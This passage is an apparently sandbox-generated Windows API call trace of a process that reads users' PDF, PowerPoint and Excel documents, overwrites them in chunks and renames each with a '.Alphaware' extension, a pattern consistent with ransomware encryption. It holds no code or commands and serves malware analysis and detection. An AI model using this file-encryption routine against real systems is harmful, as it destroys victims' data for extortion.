lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x15276 [0083.443] ReadFile (in: hFile=0x254, lpBuffer=0x12a26280, nNumberOfBytesToRead=0x15276, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x12a26280*, lpNumberOfBytesRead=0x23eb38*=0x15276, lpOverlapped=0x0) returned 1 [0083.445] CloseHandle (hObject=0x254) returned 1 [0083.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.597] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\qq69aqvcd-_ggmfehfcj.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.599] GetFileType (hFile=0x254) returned 0x1 [0083.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.599] GetFileType (hFile=0x254) returned 0x1 [0083.600] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.610] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.611] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.611] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.612] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.612] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.612] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.613] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.613] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.613] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.614] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.614] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.614] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.615] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.615] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.615] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.615] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.616] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.616] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.616] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.617] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.617] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.617] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.618] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.618] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.618] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.619] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.619] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.619] WriteFile (in: hFile=0x254, lpBuffer=0x241d7c0*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241d7c0*, lpNumberOfBytesWritten=0x23e9f8*=0x420, lpOverlapped=0x0) returned 1 [0083.619] CloseHandle (hObject=0x254) returned 1 [0083.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\qq69aqvcd-_ggmfehfcj.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5589620, ftCreationTime.dwHighDateTime=0x1d97354, ftLastAccessTime.dwLowDateTime=0x78654fb0, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x840b0b40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c420)) returned 1 [0083.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.624] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\qq69aqvcd-_ggmfehfcj.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\qQ69AqvCd-_gGmFEhfCj.pdf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\qq69aqvcd-_ggmfehfcj.pdf.alphaware")) returned 1 [0083.628] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx", lpFilePart=0x0) returned 0x30 [0083.628] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx", dwFileAttributes=0x80) returned 1 [0083.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.628] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rkf0ht0xfp-m3q.pptx"), fInfoLevelId=0x0, lpFileInformation=0x241ec48 | out: lpFileInformation=0x241ec48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9d4ae3c0, ftCreationTime.dwHighDateTime=0x1d93fbd, ftLastAccessTime.dwLowDateTime=0xdea6e0c0, ftLastAccessTime.dwHighDateTime=0x1d96539, ftLastWriteTime.dwLowDateTime=0xdea6e0c0, ftLastWriteTime.dwHighDateTime=0x1d96539, nFileSizeHigh=0x0, nFileSizeLow=0x15d1d)) returned 1 [0083.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.629] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx", lpFilePart=0x0) returned 0x30 [0083.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.629] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rkf0ht0xfp-m3q.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.630] GetFileType (hFile=0x254) returned 0x1 [0083.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.630] GetFileType (hFile=0x254) returned 0x1 [0083.630] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x15d1d [0083.630] ReadFile (in: hFile=0x254, lpBuffer=0x12759fb8, nNumberOfBytesToRead=0x15d1d, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x12759fb8*, lpNumberOfBytesRead=0x23eb38*=0x15d1d, lpOverlapped=0x0) returned 1 [0083.632] CloseHandle (hObject=0x254) returned 1 [0083.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.666] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rkf0ht0xfp-m3q.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.668] GetFileType (hFile=0x254) returned 0x1 [0083.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.668] GetFileType (hFile=0x254) returned 0x1 [0083.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rkf0ht0xfp-m3q.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4ae3c0, ftCreationTime.dwHighDateTime=0x1d93fbd, ftLastAccessTime.dwLowDateTime=0xdea6e0c0, ftLastAccessTime.dwHighDateTime=0x1d96539, ftLastWriteTime.dwLowDateTime=0x84122f60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d248)) returned 1 [0083.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.673] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rkf0ht0xfp-m3q.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\RkF0hT0Xfp-m3q.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\rkf0ht0xfp-m3q.pptx.alphaware")) returned 1 [0083.674] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx", dwFileAttributes=0x80) returned 1 [0083.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.675] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\u6t2jbtaet1hjh.pptx"), fInfoLevelId=0x0, lpFileInformation=0x249ee90 | out: lpFileInformation=0x249ee90*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4b8a7fd0, ftCreationTime.dwHighDateTime=0x1d8f5a0, ftLastAccessTime.dwLowDateTime=0x89facc90, ftLastAccessTime.dwHighDateTime=0x1d94e77, ftLastWriteTime.dwLowDateTime=0x89facc90, ftLastWriteTime.dwHighDateTime=0x1d94e77, nFileSizeHigh=0x0, nFileSizeLow=0x3909)) returned 1 [0083.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.675] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\u6t2jbtaet1hjh.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.675] GetFileType (hFile=0x254) returned 0x1 [0083.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.676] GetFileType (hFile=0x254) returned 0x1 [0083.676] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x3909 [0083.676] ReadFile (in: hFile=0x254, lpBuffer=0x249f0f8, nNumberOfBytesToRead=0x3909, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x249f0f8*, lpNumberOfBytesRead=0x23eb38*=0x3909, lpOverlapped=0x0) returned 1 [0083.677] CloseHandle (hObject=0x254) returned 1 [0083.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.703] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\u6t2jbtaet1hjh.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.704] GetFileType (hFile=0x254) returned 0x1 [0083.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.704] GetFileType (hFile=0x254) returned 0x1 [0083.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.706] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\u6t2jbtaet1hjh.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b8a7fd0, ftCreationTime.dwHighDateTime=0x1d8f5a0, ftLastAccessTime.dwLowDateTime=0x89facc90, ftLastAccessTime.dwHighDateTime=0x1d94e77, ftLastWriteTime.dwLowDateTime=0x8416f220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4ce0)) returned 1 [0083.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.706] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\u6t2jbtaet1hjh.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\U6t2jBTAet1hJh.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\u6t2jbtaet1hjh.pptx.alphaware")) returned 1 [0083.707] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx", dwFileAttributes=0x80) returned 1 [0083.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ugjb0bk8m6fbzeqf.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2544e98 | out: lpFileInformation=0x2544e98*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x97851bb0, ftCreationTime.dwHighDateTime=0x1d95c12, ftLastAccessTime.dwLowDateTime=0x36d38630, ftLastAccessTime.dwHighDateTime=0x1d96400, ftLastWriteTime.dwLowDateTime=0x36d38630, ftLastWriteTime.dwHighDateTime=0x1d96400, nFileSizeHigh=0x0, nFileSizeLow=0x9d5d)) returned 1 [0083.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.708] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ugjb0bk8m6fbzeqf.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.708] GetFileType (hFile=0x254) returned 0x1 [0083.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.708] GetFileType (hFile=0x254) returned 0x1 [0083.708] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x9d5d [0083.709] ReadFile (in: hFile=0x254, lpBuffer=0x2545110, nNumberOfBytesToRead=0x9d5d, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2545110*, lpNumberOfBytesRead=0x23eb38*=0x9d5d, lpOverlapped=0x0) returned 1 [0083.710] CloseHandle (hObject=0x254) returned 1 [0083.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.742] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ugjb0bk8m6fbzeqf.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.743] GetFileType (hFile=0x254) returned 0x1 [0083.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.743] GetFileType (hFile=0x254) returned 0x1 [0083.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ugjb0bk8m6fbzeqf.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97851bb0, ftCreationTime.dwHighDateTime=0x1d95c12, ftLastAccessTime.dwLowDateTime=0x36d38630, ftLastAccessTime.dwHighDateTime=0x1d96400, ftLastWriteTime.dwLowDateTime=0x841e1640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd2a0)) returned 1 [0083.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.746] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ugjb0bk8m6fbzeqf.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\UgJB0bK8M6Fbzeqf.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\ugjb0bk8m6fbzeqf.xlsx.alphaware")) returned 1 [0083.747] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx", dwFileAttributes=0x80) returned 1 [0083.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.748] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\wo--2pwpxtf.pptx"), fInfoLevelId=0x0, lpFileInformation=0x24074e0 | out: lpFileInformation=0x24074e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x77ec2190, ftCreationTime.dwHighDateTime=0x1d8f3df, ftLastAccessTime.dwLowDateTime=0x30b22920, ftLastAccessTime.dwHighDateTime=0x1d90f21, ftLastWriteTime.dwLowDateTime=0x30b22920, ftLastWriteTime.dwHighDateTime=0x1d90f21, nFileSizeHigh=0x0, nFileSizeLow=0x17c8b)) returned 1 [0083.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.748] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\wo--2pwpxtf.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.748] GetFileType (hFile=0x254) returned 0x1 [0083.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.748] GetFileType (hFile=0x254) returned 0x1 [0083.749] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x17c8b [0083.749] ReadFile (in: hFile=0x254, lpBuffer=0x128860d0, nNumberOfBytesToRead=0x17c8b, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x128860d0*, lpNumberOfBytesRead=0x23eb38*=0x17c8b, lpOverlapped=0x0) returned 1 [0083.751] CloseHandle (hObject=0x254) returned 1 [0083.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.834] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\wo--2pwpxtf.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.836] GetFileType (hFile=0x254) returned 0x1 [0083.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.836] GetFileType (hFile=0x254) returned 0x1 [0083.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.840] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\wo--2pwpxtf.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77ec2190, ftCreationTime.dwHighDateTime=0x1d8f3df, ftLastAccessTime.dwLowDateTime=0x30b22920, ftLastAccessTime.dwHighDateTime=0x1d90f21, ftLastWriteTime.dwLowDateTime=0x842c5e80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fc34)) returned 1 [0083.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.840] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\wo--2pwpxtf.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\wO--2PwPxtF.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\wo--2pwpxtf.pptx.alphaware")) returned 1 [0083.841] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx", dwFileAttributes=0x80) returned 1 [0083.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.842] GetFileAttributesExW (in: 